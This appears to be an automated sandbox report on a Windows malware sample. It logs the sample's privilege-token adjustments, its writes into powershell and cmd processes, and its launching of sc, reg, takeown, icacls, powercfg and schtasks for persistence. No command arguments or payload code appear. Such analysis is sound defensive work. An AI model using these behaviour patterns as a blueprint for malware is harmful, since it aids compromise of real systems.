Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7468b921-5880-43e0 = "\\\\?\\Volume{FA3589B5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\9502c38c01d2a6a14fc038926a0020d09d1a1da03552dbe902404fd88afca6d7" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c2df8f22-48ef-47b5 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\136bdf30-4153-4fb9 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c63b2d5-91d3-4cc1 = (binary data omitted) C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9ae09148-a8e8-4149 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7468b921-5880-43e0 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\124f038e-c3b3-41e9 = 1166813a77eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b72e70e0-1598-4afa = "0" C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2500 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2500 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2500 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 2500 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 2500 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 2500 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 1072 wrote to memory of 3144 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1072 wrote to memory of 3144 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4660 wrote to memory of 1008 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4660 wrote to memory of 1008 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 1072 wrote to memory of 4872 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1072 wrote to memory of 4872 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1072 wrote to memory of 1380 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1072 wrote to memory of 1380 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4660 wrote to memory of 736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4660 wrote to memory of 736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 1072 wrote to memory of 2080 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1072 wrote to memory of 2080 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1072 wrote to memory of 2360 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1072 wrote to memory of 2360 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1072 wrote to memory of 3240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 3240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4660 wrote to memory of 2508 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4660 wrote to memory of 2508 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 1072 wrote to memory of 4664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 4664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 4044 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 4044 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4660 wrote to memory of 4032 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4660 wrote to memory of 4032 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 1072 wrote to memory of 960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 2960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 2960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 4828 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1072 wrote to memory of 4828 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1072 wrote to memory of 4140 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1072 wrote to memory of 4140 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1072 wrote to memory of 548 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 548 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 2488 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 2488 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 3812 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 3812 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 3248 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 3248 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1072 wrote to memory of 2344 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 2344 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 4048 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 4048 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 1100 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 1100 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 1264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 1264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 4328 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1072 wrote to memory of 4328 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2500 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\conhost.exe
PID 2500 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\conhost.exe
PID 2500 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\conhost.exe
PID 2500 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\conhost.exe
PID 2500 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\conhost.exe
PID 2500 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\conhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

